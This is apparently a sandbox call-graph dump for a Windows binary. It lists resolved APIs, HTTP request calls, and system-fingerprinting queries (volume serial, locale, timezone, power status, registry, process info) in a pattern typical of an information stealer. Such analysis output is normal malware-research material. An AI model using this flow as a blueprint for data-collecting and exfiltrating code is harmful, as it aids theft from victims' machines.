14308->14309 14310 673c17 14309->14310 14311 6745c0 2 API calls 14310->14311 14312 673c30 14311->14312 14313 6745c0 2 API calls 14312->14313 14314 673c49 14313->14314 14315 6745c0 2 API calls 14314->14315 14316 673c62 14315->14316 14317 6745c0 2 API calls 14316->14317 14318 673c7b 14317->14318 14319 6745c0 2 API calls 14318->14319 14320 673c94 14319->14320 14321 6745c0 2 API calls 14320->14321 14322 673cad 14321->14322 14323 6745c0 2 API calls 14322->14323 14324 673cc6 14323->14324 14325 6745c0 2 API calls 14324->14325 14326 673cdf 14325->14326 14327 6745c0 2 API calls 14326->14327 14328 673cf8 14327->14328 14329 6745c0 2 API calls 14328->14329 14330 673d11 14329->14330 14331 6745c0 2 API calls 14330->14331 14332 673d2a 14331->14332 14333 6745c0 2 API calls 14332->14333 14334 673d43 14333->14334 14335 6745c0 2 API calls 14334->14335 14336 673d5c 14335->14336 14337 6745c0 2 API calls 14336->14337 14338 673d75 14337->14338 14339 6745c0 2 API calls 14338->14339 14340 673d8e 14339->14340 14341 6745c0 2 API calls 14340->14341 14342 673da7 14341->14342 14343 6745c0 2 API calls 14342->14343 14344 673dc0 14343->14344 14345 6745c0 2 API calls 14344->14345 14346 673dd9 14345->14346 14347 6745c0 2 API calls 14346->14347 14348 673df2 14347->14348 14349 6745c0 2 API calls 14348->14349 14350 673e0b 14349->14350 14351 6745c0 2 API calls 14350->14351 14352 673e24 14351->14352 14353 6745c0 2 API calls 14352->14353 14354 673e3d 14353->14354 14355 6745c0 2 API calls 14354->14355 14356 673e56 14355->14356 14357 6745c0 2 API calls 14356->14357 14358 673e6f 14357->14358 14359 6745c0 2 API calls 14358->14359 14360 673e88 14359->14360 14361 6745c0 2 API calls 14360->14361 14362 673ea1 14361->14362 14363 6745c0 2 API calls 14362->14363 14364 673eba 14363->14364 14365 6745c0 2 API calls 14364->14365 14366 673ed3 14365->14366 14367 6745c0 2 API calls 14366->14367 14368 673eec 14367->14368 14369 6745c0 2 API calls 14368->14369 14370 673f05 14369->14370 14371 6745c0 2 API calls 14370->14371 14372 673f1e 14371->14372 14373 6745c0 2 API calls 14372->14373 14374 673f37 14373->14374 14375 6745c0 2 API calls 14374->14375 14376 673f50 14375->14376 14377 6745c0 2 API calls 14376->14377 14378 673f69 14377->14378 14379 6745c0 2 API calls 14378->14379 14380 673f82 14379->14380 14381 6745c0 2 API calls 14380->14381 14382 673f9b 14381->14382 14383 6745c0 2 API calls 14382->14383 14384 673fb4 14383->14384 14385 6745c0 2 API calls 14384->14385 14386 673fcd 14385->14386 14387 6745c0 2 API calls 14386->14387 14388 673fe6 14387->14388 14389 6745c0 2 API calls 14388->14389 14390 673fff 14389->14390 14391 6745c0 2 API calls 14390->14391 14392 674018 14391->14392 14393 6745c0 2 API calls 14392->14393 14394 674031 14393->14394 14395 6745c0 2 API calls 14394->14395 14396 67404a 14395->14396 14397 6745c0 2 API calls 14396->14397 14398 674063 14397->14398 14399 6745c0 2 API calls 14398->14399 14400 67407c 14399->14400 14401 6745c0 2 API calls 14400->14401 14402 674095 14401->14402 14403 6745c0 2 API calls 14402->14403 14404 6740ae 14403->14404 14405 6745c0 2 API calls 14404->14405 14406 6740c7 14405->14406 14407 6745c0 2 API calls 14406->14407 14408 6740e0 14407->14408 14409 6745c0 2 API calls 14408->14409 14410 6740f9 14409->14410 14411 6745c0 2 API calls 14410->14411 14412 674112 14411->14412 14413 6745c0 2 API calls 14412->14413 14414 67412b 14413->14414 14415 6745c0 2 API calls 14414->14415 14416 674144 14415->14416 14417 6745c0 2 API calls 14416->14417 14418 67415d 14417->14418 14419 6745c0 2 API calls 14418->14419 14420 674176 14419->14420 14421 6745c0 2 API calls 14420->14421 14422 67418f 14421->14422 14423 6745c0 2 API calls 14422->14423 14424 6741a8 14423->14424 14425 6745c0 2 API calls 14424->14425 14426 6741c1 14425->14426 14427 6745c0 2 API calls 14426->14427 14428 6741da 14427->14428 14429 6745c0 2 API calls 14428->14429 14430 6741f3 14429->14430 14431 6745c0 2 API calls 14430->14431 14432 67420c 14431->14432 14433 6745c0 2 API calls 14432->14433 14434 674225 14433->14434 14435 6745c0 2 API calls 14434->14435 14436 67423e 14435->14436 14437 6745c0 2 API calls 14436->14437 14438 674257 14437->14438 14439 6745c0 2 API calls 14438->14439 14440 674270 14439->14440 14441 6745c0 2 API calls 14440->14441 14442 674289 14441->14442 14443 6745c0 2 API calls 14442->14443 14444 6742a2 14443->14444 14445 6745c0 2 API calls 14444->14445 14446 6742bb 14445->14446 14447 6745c0 2 API calls 14446->14447 14448 6742d4 14447->14448 14449 6745c0 2 API calls 14448->14449 14450 6742ed 14449->14450 14451 6745c0 2 API calls 14450->14451 14452 674306 14451->14452 14453 6745c0 2 API calls 14452->14453 14454 67431f 14453->14454 14455 6745c0 2 API calls 14454->14455 14456 674338 14455->14456 14457 6745c0 2 API calls 14456->14457 14458 674351 14457->14458 14459 6745c0 2 API calls 14458->14459 14460 67436a 14459->14460 14461 6745c0 2 API calls 14460->14461 14462 674383 14461->14462 14463 6745c0 2 API calls 14462->14463 14464 67439c 14463->14464 14465 6745c0 2 API calls 14464->14465 14466 6743b5 14465->14466 14467 6745c0 2 API calls 14466->14467 14468 6743ce 14467->14468 14469 6745c0 2 API calls 14468->14469 14470 6743e7 14469->14470 14471 6745c0 2 API calls 14470->14471 14472 674400 14471->14472 14473 6745c0 2 API calls 14472->14473 14474 674419 14473->14474 14475 6745c0 2 API calls 14474->14475 14476 674432 14475->14476 14477 6745c0 2 API calls 14476->14477 14478 67444b 14477->14478 14479 6745c0 2 API calls 14478->14479 14480 674464 14479->14480 14481 6745c0 2 API calls 14480->14481 14482 67447d 14481->14482 14483 6745c0 2 API calls 14482->14483 14484 674496 14483->14484 14485 6745c0 2 API calls 14484->14485 14486 6744af 14485->14486 14487 6745c0 2 API calls 14486->14487 14488 6744c8 14487->14488 14489 6745c0 2 API calls 14488->14489 14490 6744e1 14489->14490 14491 6745c0 2 API calls 14490->14491 14492 6744fa 14491->14492 14493 6745c0 2 API calls 14492->14493 14494 674513 14493->14494 14495 6745c0 2 API calls 14494->14495 14496 67452c 14495->14496 14497 6745c0 2 API calls 14496->14497 14498 674545 14497->14498 14499 6745c0 2 API calls 14498->14499 14500 67455e 14499->14500 14501 6745c0 2 API calls 14500->14501 14502 674577 14501->14502 14503 6745c0 2 API calls 14502->14503 14504 674590 14503->14504 14505 6745c0 2 API calls 14504->14505 14506 6745a9 14505->14506 14507 689c10 14506->14507 14508 689c20 43 API calls 14507->14508 14509 68a036 8 API calls 14507->14509 14508->14509 14510 68a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14509->14510 14511 68a146 14509->14511 14510->14511 14512 68a153 8 API calls 14511->14512 14513 68a216 14511->14513 14512->14513 14514 68a298 14513->14514 14515 68a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14513->14515 14516 68a2a5 6 API calls 14514->14516 14517 68a337 14514->14517 14515->14514 14516->14517 14518 68a41f 14517->14518 14519 68a344 9 API calls 14517->14519 14520 68a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14518->14520 14521 68a4a2 14518->14521 14519->14518 14520->14521 14522 68a4ab GetProcAddress GetProcAddress 14521->14522 14523 68a4dc 14521->14523 14522->14523 14524 68a515 14523->14524 14525 68a4e5 GetProcAddress GetProcAddress 14523->14525 14526 68a612 14524->14526 14527 68a522 10 API calls 14524->14527 14525->14524 14528 68a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14526->14528 14529 68a67d 14526->14529 14527->14526 14528->14529 14530 68a69e 14529->14530 14531 68a686 GetProcAddress 14529->14531 14532 685ca3 14530->14532 14533 68a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14530->14533 14531->14530 14534 671590 14532->14534 14533->14532 15653 671670 14534->15653 14537 68a7a0 lstrcpy 14538 6715b5 14537->14538 14539 68a7a0 lstrcpy 14538->14539 14540 6715c7 14539->14540 14541 68a7a0 lstrcpy 14540->14541 14542 6715d9 14541->14542 14543 68a7a0 lstrcpy 14542->14543 14544 671663 14543->14544 14545 685510 14544->14545 14546 685521 14545->14546 14547 68a820 2 API calls 14546->14547 14548 68552e 14547->14548 14549 68a820 2 API calls 14548->14549 14550 68553b 14549->14550 14551 68a820 2 API calls 14550->14551 14552 685548 14551->14552 14553 68a740 lstrcpy 14552->14553 14554 685555 14553->14554 14555 68a740 lstrcpy 14554->14555 14556 685562 14555->14556 14557 68a740 lstrcpy 14556->14557 14558 68556f 14557->14558 14559 68a740 lstrcpy 14558->14559 14597 68557c 14559->14597 14560 6852c0 25 API calls 14560->14597 14561 6851f0 20 API calls 14561->14597 14562 685643 StrCmpCA 14562->14597 14563 6856a0 StrCmpCA 14564 6857dc 14563->14564 14563->14597 14565 68a8a0 lstrcpy 14564->14565 14566 6857e8 14565->14566 14568 68a820 2 API calls 14566->14568 14567 68a820 lstrlen lstrcpy 14567->14597 14569 6857f6 14568->14569 14572 68a820 2 API calls 14569->14572 14570 685856 StrCmpCA 14571 685991 14570->14571 14570->14597 14573 68a8a0 lstrcpy 14571->14573 14574 685805 14572->14574 14575 68599d 14573->14575 14576 671670 lstrcpy 14574->14576 14577 68a820 2 API calls 14575->14577 14596 685811 14576->14596 14579 6859ab 14577->14579 14578 685a0b StrCmpCA 14580 685a28 14578->14580 14581 685a16 Sleep 14578->14581 14583 68a820 2 API calls 14579->14583 14584 68a8a0 lstrcpy 14580->14584 14581->14597 14582 68a740 lstrcpy 14582->14597 14585 6859ba 14583->14585 14587 685a34 14584->14587 14586 671670 lstrcpy 14585->14586 14586->14596 14588 68a820 2 API calls 14587->14588 14589 685a43 14588->14589 14590 68a820 2 API calls 14589->14590 14591 685a52 14590->14591 14593 671670 lstrcpy 14591->14593 14592 68578a StrCmpCA 14592->14597 14593->14596 14594 671590 lstrcpy 14594->14597 14595 68593f StrCmpCA 14595->14597 14596->13652 14597->14560 14597->14561 14597->14562 14597->14563 14597->14567 14597->14570 14597->14578 14597->14582 14597->14592 14597->14594 14597->14595 14598 68a7a0 lstrcpy 14597->14598 14599 68a8a0 lstrcpy 14597->14599 14598->14597 14599->14597 14601 68754c 14600->14601 14602 687553 GetVolumeInformationA 14600->14602 14601->14602 14603 687591 14602->14603 14604 6875fc GetProcessHeap RtlAllocateHeap 14603->14604 14605 687628 wsprintfA 14604->14605 14606 687619 14604->14606 14608 68a740 lstrcpy 14605->14608 14607 68a740 lstrcpy 14606->14607 14609 685da7 14607->14609 14608->14609 14609->13673 14611 68a7a0 lstrcpy 14610->14611 14612 674899 14611->14612 15662 6747b0 14612->15662 14614 6748a5 14615 68a740 lstrcpy 14614->14615 14616 6748d7 14615->14616 14617 68a740 lstrcpy 14616->14617 14618 6748e4 14617->14618 14619 68a740 lstrcpy 14618->14619 14620 6748f1 14619->14620 14621 68a740 lstrcpy 14620->14621 14622 6748fe 14621->14622 14623 68a740 lstrcpy 14622->14623 14624 67490b InternetOpenA StrCmpCA 14623->14624 14625 674944 14624->14625 14626 674ecb InternetCloseHandle 14625->14626 15668 688b60 14625->15668 14628 674ee8 14626->14628 15683 679ac0 CryptStringToBinaryA 14628->15683 14629 674963 15676 68a920 14629->15676 14632 674976 14634 68a8a0 lstrcpy 14632->14634 14640 67497f 14634->14640 14635 68a820 2 API calls 14636 674f05 14635->14636 14637 68a9b0 4 API calls 14636->14637 14639 674f1b 14637->14639 14638 674f27 codecvt 14642 68a7a0 lstrcpy 14638->14642 14641 68a8a0 lstrcpy 14639->14641 14643 68a9b0 4 API calls 14640->14643 14641->14638 14655 674f57 14642->14655 14644 6749a9 14643->14644 14645 68a8a0 lstrcpy 14644->14645 14646 6749b2 14645->14646 14647 68a9b0 4 API calls 14646->14647 14648 6749d1 14647->14648 14649 68a8a0 lstrcpy 14648->14649 14650 6749da 14649->14650 14651 68a920 3 API calls 14650->14651 14652 6749f8 14651->14652 14653 68a8a0 lstrcpy 14652->14653 14654 674a01 14653->14654 14656 68a9b0 4 API calls 14654->14656 14655->13676 14657 674a20 14656->14657 14658 68a8a0 lstrcpy 14657->14658 14659 674a29 14658->14659 14660 68a9b0 4 API calls 14659->14660 14661 674a48 14660->14661 14662 68a8a0 lstrcpy 14661->14662 14663 674a51 14662->14663 14664 68a9b0 4 API calls 14663->14664 14665 674a7d 14664->14665 14666 68a920 3 API calls 14665->14666 14667 674a84 14666->14667 14668 68a8a0 lstrcpy 14667->14668 14669 674a8d 14668->14669 14670 674aa3 InternetConnectA 14669->14670 14670->14626 14671 674ad3 HttpOpenRequestA 14670->14671 14673 674ebe InternetCloseHandle 14671->14673 14674 674b28 14671->14674 14673->14626 14675 68a9b0 4 API calls 14674->14675 14676 674b3c 14675->14676 14677 68a8a0 lstrcpy 14676->14677 14678 674b45 14677->14678 14679 68a920 3 API calls 14678->14679 14680 674b63 14679->14680 14681 68a8a0 lstrcpy 14680->14681 14682 674b6c 14681->14682 14683 68a9b0 4 API calls 14682->14683 14684 674b8b 14683->14684 14685 68a8a0 lstrcpy 14684->14685 14686 674b94 14685->14686 14687 68a9b0 4 API calls 14686->14687 14688 674bb5 14687->14688 14689 68a8a0 lstrcpy 14688->14689 14690 674bbe 14689->14690 14691 68a9b0 4 API calls 14690->14691 14692 674bde 14691->14692 14693 68a8a0 lstrcpy 14692->14693 14694 674be7 14693->14694 14695 68a9b0 4 API calls 14694->14695 14696 674c06 14695->14696 14697 68a8a0 lstrcpy 14696->14697 14698 674c0f 14697->14698 14699 68a920 3 API calls 14698->14699 14700 674c2d 14699->14700 14701 68a8a0 lstrcpy 14700->14701 14702 674c36 14701->14702 14703 68a9b0 4 API calls 14702->14703 14704 674c55 14703->14704 14705 68a8a0 lstrcpy 14704->14705 14706 674c5e 14705->14706 14707 68a9b0 4 API calls 14706->14707 14708 674c7d 14707->14708 14709 68a8a0 lstrcpy 14708->14709 14710 674c86 14709->14710 14711 68a920 3 API calls 14710->14711 14712 674ca4 14711->14712 14713 68a8a0 lstrcpy 14712->14713 14714 674cad 14713->14714 14715 68a9b0 4 API calls 14714->14715 14716 674ccc 14715->14716 14717 68a8a0 lstrcpy 14716->14717 14718 674cd5 14717->14718 14719 68a9b0 4 API calls 14718->14719 14720 674cf6 14719->14720 14721 68a8a0 lstrcpy 14720->14721 14722 674cff 14721->14722 14723 68a9b0 4 API calls 14722->14723 14724 674d1f 14723->14724 14725 68a8a0 lstrcpy 14724->14725 14726 674d28 14725->14726 14727 68a9b0 4 API calls 14726->14727 14728 674d47 14727->14728 14729 68a8a0 lstrcpy 14728->14729 14730 674d50 14729->14730 14731 68a920 3 API calls 14730->14731 14732 674d6e 14731->14732 14733 68a8a0 lstrcpy 14732->14733 14734 674d77 14733->14734 14735 68a740 lstrcpy 14734->14735 14736 674d92 14735->14736 14737 68a920 3 API calls 14736->14737 14738 674db3 14737->14738 14739 68a920 3 API calls 14738->14739 14740 674dba 14739->14740 14741 68a8a0 lstrcpy 14740->14741 14742 674dc6 14741->14742 14743 674de7 lstrlen 14742->14743 14744 674dfa 14743->14744 14745 674e03 lstrlen 14744->14745 15682 68aad0 14745->15682 14747 674e13 HttpSendRequestA 14748 674e32 InternetReadFile 14747->14748 14749 674e67 InternetCloseHandle 14748->14749 14754 674e5e 14748->14754 14752 68a800 14749->14752 14751 68a9b0 4 API calls 14751->14754 14752->14673 14753 68a8a0 lstrcpy 14753->14754 14754->14748 14754->14749 14754->14751 14754->14753 15689 68aad0 14755->15689 14757 6817c4 StrCmpCA 14758 6817cf ExitProcess 14757->14758 14760 6817d7 14757->14760 14759 6819c2 14759->13678 14760->14759 14761 6818ad StrCmpCA 14760->14761 14762 6818cf StrCmpCA 14760->14762 14763 68185d StrCmpCA 14760->14763 14764 68187f StrCmpCA 14760->14764 14765 681970 StrCmpCA 14760->14765 14766 6818f1 StrCmpCA 14760->14766 14767 681951 StrCmpCA 14760->14767 14768 681932 StrCmpCA 14760->14768 14769 681913 StrCmpCA 14760->14769 14770 68a820 lstrlen lstrcpy 14760->14770 14761->14760 14762->14760 14763->14760 14764->14760 14765->14760 14766->14760 14767->14760 14768->14760 14769->14760 14770->14760 14772 68a7a0 lstrcpy 14771->14772 14773 675979 14772->14773 14774 6747b0 2 API calls 14773->14774 14775 675985 14774->14775 14776 68a740 lstrcpy 14775->14776 14777 6759ba 14776->14777 14778 68a740 lstrcpy 14777->14778 14779 6759c7 14778->14779 14780 68a740 lstrcpy 14779->14780 14781 6759d4 14780->14781 14782 68a740 lstrcpy 14781->14782 14783 6759e1 14782->14783 14784 68a740 lstrcpy 14783->14784 14785 6759ee InternetOpenA StrCmpCA 14784->14785 14786 675a1d 14785->14786 14787 675fc3 InternetCloseHandle 14786->14787 14788 688b60 3 API calls 14786->14788 14789 675fe0 14787->14789 14790 675a3c 14788->14790 14792 679ac0 4 API calls 14789->14792 14791 68a920 3 API calls 14790->14791 14793 675a4f 14791->14793 14794 675fe6 14792->14794 14795 68a8a0 lstrcpy 14793->14795 14796 68a820 2 API calls 14794->14796 14798 67601f codecvt 14794->14798 14800 675a58 14795->14800 14797 675ffd 14796->14797 14799 68a9b0 4 API calls 14797->14799 14802 68a7a0 lstrcpy 14798->14802 14801 676013 14799->14801 14804 68a9b0 4 API calls 14800->14804 14803 68a8a0 lstrcpy 14801->14803 14812 67604f 14802->14812 14803->14798 14805 675a82 14804->14805 14806 68a8a0 lstrcpy 14805->14806 14807 675a8b 14806->14807 14808 68a9b0 4 API calls 14807->14808 14809 675aaa 14808->14809 14810 68a8a0 lstrcpy 14809->14810 14811 675ab3 14810->14811 14813 68a920 3 API calls 14811->14813 14812->13684 14814 675ad1 14813->14814 14815 68a8a0 lstrcpy 14814->14815 14816 675ada 14815->14816 14817 68a9b0 4 API calls 14816->14817 14818 675af9 14817->14818 14819 68a8a0 lstrcpy 14818->14819 14820 675b02 14819->14820 14821 68a9b0 4 API calls 14820->14821 14822 675b21 14821->14822 14823 68a8a0 lstrcpy 14822->14823 14824 675b2a 14823->14824 14825 68a9b0 4 API calls 14824->14825 14826 675b56 14825->14826 14827 68a920 3 API calls 14826->14827 14828 675b5d 14827->14828 14829 68a8a0 lstrcpy 14828->14829 14830 675b66 14829->14830 14831 675b7c InternetConnectA 14830->14831 14831->14787 14832 675bac HttpOpenRequestA 14831->14832 14834 675fb6 InternetCloseHandle 14832->14834 14835 675c0b 14832->14835 14834->14787 14836 68a9b0 4 API calls 14835->14836 14837 675c1f 14836->14837 14838 68a8a0 lstrcpy 14837->14838 14839 675c28 14838->14839 14840 68a920 3 API calls 14839->14840 14841 675c46 14840->14841 14842 68a8a0 lstrcpy 14841->14842 14843 675c4f 14842->14843 14844 68a9b0 4 API calls 14843->14844 14845 675c6e 14844->14845 14846 68a8a0 lstrcpy 14845->14846 14847 675c77 14846->14847 14848 68a9b0 4 API calls 14847->14848 14849 675c98 14848->14849 14850 68a8a0 lstrcpy 14849->14850 14851 675ca1 14850->14851 14852 68a9b0 4 API calls 14851->14852 14853 675cc1 14852->14853 14854 68a8a0 lstrcpy 14853->14854 14855 675cca 14854->14855 14856 68a9b0 4 API calls 14855->14856 14857 675ce9 14856->14857 14858 68a8a0 lstrcpy 14857->14858 14859 675cf2 14858->14859 14860 68a920 3 API calls 14859->14860 14861 675d10 14860->14861 14862 68a8a0 lstrcpy 14861->14862 14863 675d19 14862->14863 14864 68a9b0 4 API calls 14863->14864 14865 675d38 14864->14865 14866 68a8a0 lstrcpy 14865->14866 14867 675d41 14866->14867 14868 68a9b0 4 API calls 14867->14868 14869 675d60 14868->14869 14870 68a8a0 lstrcpy 14869->14870 14871 675d69 14870->14871 14872 68a920 3 API calls 14871->14872 14873 675d87 14872->14873 14874 68a8a0 lstrcpy 14873->14874 14875 675d90 14874->14875 14876 68a9b0 4 API calls 14875->14876 14877 675daf 14876->14877 14878 68a8a0 lstrcpy 14877->14878 14879 675db8 14878->14879 14880 68a9b0 4 API calls 14879->14880 14881 675dd9 14880->14881 14882 68a8a0 lstrcpy 14881->14882 14883 675de2 14882->14883 14884 68a9b0 4 API calls 14883->14884 14885 675e02 14884->14885 14886 68a8a0 lstrcpy 14885->14886 14887 675e0b 14886->14887 14888 68a9b0 4 API calls 14887->14888 14889 675e2a 14888->14889 14890 68a8a0 lstrcpy 14889->14890 14891 675e33 14890->14891 14892 68a920 3 API calls 14891->14892 14893 675e54 14892->14893 14894 68a8a0 lstrcpy 14893->14894 14895 675e5d 14894->14895 14896 675e70 lstrlen 14895->14896 15690 68aad0 14896->15690 14898 675e81 lstrlen GetProcessHeap RtlAllocateHeap 15691 68aad0 14898->15691 14900 675eae lstrlen 14901 675ebe 14900->14901 14902 675ed7 lstrlen 14901->14902 14903 675ee7 14902->14903 14904 675ef0 lstrlen 14903->14904 14905 675f04 14904->14905 14906 675f1a lstrlen 14905->14906 15692 68aad0 14906->15692 14908 675f2a HttpSendRequestA 14909 675f35 InternetReadFile 14908->14909 14910 675f6a InternetCloseHandle 14909->14910 14914 675f61 14909->14914 14910->14834 14912 68a9b0 4 API calls 14912->14914 14913 68a8a0 lstrcpy 14913->14914 14914->14909 14914->14910 14914->14912 14914->14913 14917 681077 14915->14917 14916 681151 14916->13686 14917->14916 14918 68a820 lstrlen lstrcpy 14917->14918 14918->14917 14920 680db7 14919->14920 14921 680f17 14920->14921 14922 680ea4 StrCmpCA 14920->14922 14923 680e27 StrCmpCA 14920->14923 14924 680e67 StrCmpCA 14920->14924 14925 68a820 lstrlen lstrcpy 14920->14925 14921->13694 14922->14920 14923->14920 14924->14920 14925->14920 14930 680f67 14926->14930 14927 681044 14927->13702 14928 680fb2 StrCmpCA 14928->14930 14929 68a820 lstrlen lstrcpy 14929->14930 14930->14927 14930->14928 14930->14929 14932 68a740 lstrcpy 14931->14932 14933 681a26 14932->14933 14934 68a9b0 4 API calls 14933->14934 14935 681a37 14934->14935 14936 68a8a0 lstrcpy 14935->14936 14937 681a40 14936->14937 14938 68a9b0 4 API calls 14937->14938 14939 681a5b 14938->14939 14940 68a8a0 lstrcpy 14939->14940 14941 681a64 14940->14941 14942 68a9b0 4 API calls 14941->14942 14943 681a7d 14942->14943 14944 68a8a0 lstrcpy 14943->14944 14945 681a86 14944->14945 14946 68a9b0 4 API calls 14945->14946 14947 681aa1 14946->14947 14948 68a8a0 lstrcpy 14947->14948 14949 681aaa 14948->14949 14950 68a9b0 4 API calls 14949->14950 14951 681ac3 14950->14951 14952 68a8a0 lstrcpy 14951->14952 14953 681acc 14952->14953 14954 68a9b0 4 API calls 14953->14954 14955 681ae7 14954->14955 14956 68a8a0 lstrcpy 14955->14956 14957 681af0 14956->14957 14958 68a9b0 4 API calls 14957->14958 14959 681b09 14958->14959 14960 68a8a0 lstrcpy 14959->14960 14961 681b12 14960->14961 14962 68a9b0 4 API calls 14961->14962 14963 681b2d 14962->14963 14964 68a8a0 lstrcpy 14963->14964 14965 681b36 14964->14965 14966 68a9b0 4 API calls 14965->14966 14967 681b4f 14966->14967 14968 68a8a0 lstrcpy 14967->14968 14969 681b58 14968->14969 14970 68a9b0 4 API calls 14969->14970 14971 681b76 14970->14971 14972 68a8a0 lstrcpy 14971->14972 14973 681b7f 14972->14973 14974 687500 6 API calls 14973->14974 14975 681b96 14974->14975 14976 68a920 3 API calls 14975->14976 14977 681ba9 14976->14977 14978 68a8a0 lstrcpy 14977->14978 14979 681bb2 14978->14979 14980 68a9b0 4 API calls 14979->14980 14981 681bdc 14980->14981 14982 68a8a0 lstrcpy 14981->14982 14983 681be5 14982->14983 14984 68a9b0 4 API calls 14983->14984 14985 681c05 14984->14985 14986 68a8a0 lstrcpy 14985->14986 14987 681c0e 14986->14987 15693 687690 GetProcessHeap RtlAllocateHeap 14987->15693 14990 68a9b0 4 API calls 14991 681c2e 14990->14991 14992 68a8a0 lstrcpy 14991->14992 14993 681c37 14992->14993 14994 68a9b0 4 API calls 14993->14994 14995 681c56 14994->14995 14996 68a8a0 lstrcpy 14995->14996 14997 681c5f 14996->14997 14998 68a9b0 4 API calls 14997->14998 14999 681c80 14998->14999 15000 68a8a0 lstrcpy 14999->15000 15001 681c89 15000->15001 15700 6877c0 GetCurrentProcess IsWow64Process 15001->15700 15004 68a9b0 4 API calls 15005 681ca9 15004->15005 15006 68a8a0 lstrcpy 15005->15006 15007 681cb2 15006->15007 15008 68a9b0 4 API calls 15007->15008 15009 681cd1 15008->15009 15010 68a8a0 lstrcpy 15009->15010 15011 681cda 15010->15011 15012 68a9b0 4 API calls 15011->15012 15013 681cfb 15012->15013 15014 68a8a0 lstrcpy 15013->15014 15015 681d04 15014->15015 15016 687850 3 API calls 15015->15016 15017 681d14 15016->15017 15018 68a9b0 4 API calls 15017->15018 15019 681d24 15018->15019 15020 68a8a0 lstrcpy 15019->15020 15021 681d2d 15020->15021 15022 68a9b0 4 API calls 15021->15022 15023 681d4c 15022->15023 15024 68a8a0 lstrcpy 15023->15024 15025 681d55 15024->15025 15026 68a9b0 4 API calls 15025->15026 15027 681d75 15026->15027 15028 68a8a0 lstrcpy 15027->15028 15029 681d7e 15028->15029 15030 6878e0 3 API calls 15029->15030 15031 681d8e 15030->15031 15032 68a9b0 4 API calls 15031->15032 15033 681d9e 15032->15033 15034 68a8a0 lstrcpy 15033->15034 15035 681da7 15034->15035 15036 68a9b0 4 API calls 15035->15036 15037 681dc6 15036->15037 15038 68a8a0 lstrcpy 15037->15038 15039 681dcf 15038->15039 15040 68a9b0 4 API calls 15039->15040 15041 681df0 15040->15041 15042 68a8a0 lstrcpy 15041->15042 15043 681df9 15042->15043 15702 687980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15043->15702 15046 68a9b0 4 API calls 15047 681e19 15046->15047 15048 68a8a0 lstrcpy 15047->15048 15049 681e22 15048->15049 15050 68a9b0 4 API calls 15049->15050 15051 681e41 15050->15051 15052 68a8a0 lstrcpy 15051->15052 15053 681e4a 15052->15053 15054 68a9b0 4 API calls 15053->15054 15055 681e6b 15054->15055 15056 68a8a0 lstrcpy 15055->15056 15057 681e74 15056->15057 15704 687a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15057->15704 15060 68a9b0 4 API calls 15061 681e94 15060->15061 15062 68a8a0 lstrcpy 15061->15062 15063 681e9d 15062->15063 15064 68a9b0 4 API calls 15063->15064 15065 681ebc 15064->15065 15066 68a8a0 lstrcpy 15065->15066 15067 681ec5 15066->15067 15068 68a9b0 4 API calls 15067->15068 15069 681ee5 15068->15069 15070 68a8a0 lstrcpy 15069->15070 15071 681eee 15070->15071 15707 687b00 GetUserDefaultLocaleName 15071->15707 15074 68a9b0 4 API calls 15075 681f0e 15074->15075 15076 68a8a0 lstrcpy 15075->15076 15077 681f17 15076->15077 15078 68a9b0 4 API calls 15077->15078 15079 681f36 15078->15079 15080 68a8a0 lstrcpy 15079->15080 15081 681f3f 15080->15081 15082 68a9b0 4 API calls 15081->15082 15083 681f60 15082->15083 15084 68a8a0 lstrcpy 15083->15084 15085 681f69 15084->15085 15711 687b90 15085->15711 15087 681f80 15088 68a920 3 API calls 15087->15088 15089 681f93 15088->15089 15090 68a8a0 lstrcpy 15089->15090 15091 681f9c 15090->15091 15092 68a9b0 4 API calls 15091->15092 15093 681fc6 15092->15093 15094 68a8a0 lstrcpy 15093->15094 15095 681fcf 15094->15095 15096 68a9b0 4 API calls 15095->15096 15097 681fef 15096->15097 15098 68a8a0 lstrcpy 15097->15098 15099 681ff8 15098->15099 15723 687d80 GetSystemPowerStatus 15099->15723 15102 68a9b0 4 API calls 15103 682018 15102->15103 15104 68a8a0 lstrcpy 15103->15104 15105 682021 15104->15105 15106 68a9b0 4 API calls 15105->15106 15107 682040 15106->15107 15108 68a8a0 lstrcpy 15107->15108 15109 682049 15108->15109 15110 68a9b0 4 API calls 15109->15110 15111 68206a 15110->15111 15112 68a8a0 lstrcpy 15111->15112 15113 682073 15112->15113 15114 68207e GetCurrentProcessId 15113->15114 15725 689470 OpenProcess 15114->15725 15117 68a920 3 API calls 15118 6820a4 15117->15118 15119 68a8a0 lstrcpy 15118->15119 15120 6820ad 15119->15120 15121 68a9b0 4 API calls 15120->15121 15122 6820d7 15121->15122 15123 68a8a0 lstrcpy 15122->15123 15124 6820e0 15123->15124 15125 68a9b0 4 API calls 15124->15125 15126 682100 15125->15126 15127 68a8a0 lstrcpy 15126->15127 15128 682109 15127->15128 15730 687e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15128->15730 15131 68a9b0 4 API calls 15132 682129 15131->15132 15133 68a8a0 lstrcpy 15132->15133 15134 682132 15133->15134 15135 68a9b0 4 API calls 15134->15135 15136 682151 15135->15136 15137 68a8a0 lstrcpy 15136->15137 15138 68215a 15137->15138 15139 68a9b0 4 API calls 15138->15139 15140 68217b 15139->15140 15141 68a8a0 lstrcpy 15140->15141 15142 682184 15141->15142 15734 687f60 15142->15734 15145 68a9b0 4 API calls 15146 6821a4 15145->15146 15147 68a8a0 lstrcpy 15146->15147 15148 6821ad 15147->15148 15149 68a9b0 4 API calls 15148->15149 15150 6821cc 15149->15150 15151 68a8a0 lstrcpy 15150->15151 15152 6821d5 15151->15152 15153 68a9b0 4 API calls 15152->15153 15154 6821f6 15153->15154 15155 68a8a0 lstrcpy 15154->15155 15156 6821ff 15155->15156 15747 687ed0 GetSystemInfo wsprintfA 15156->15747 15159 68a9b0 4 API calls 15160 68221f 15159->15160 15161 68a8a0 lstrcpy 15160->15161 15162 682228 15161->15162 15163 68a9b0 4 API calls 15162->15163 15164 682247 15163->15164 15165 68a8a0 lstrcpy 15164->15165 15166 682250 15165->15166 15167 68a9b0 4 API calls 15166->15167 15168 682270 15167->15168 15169 68a8a0 lstrcpy 15168->15169 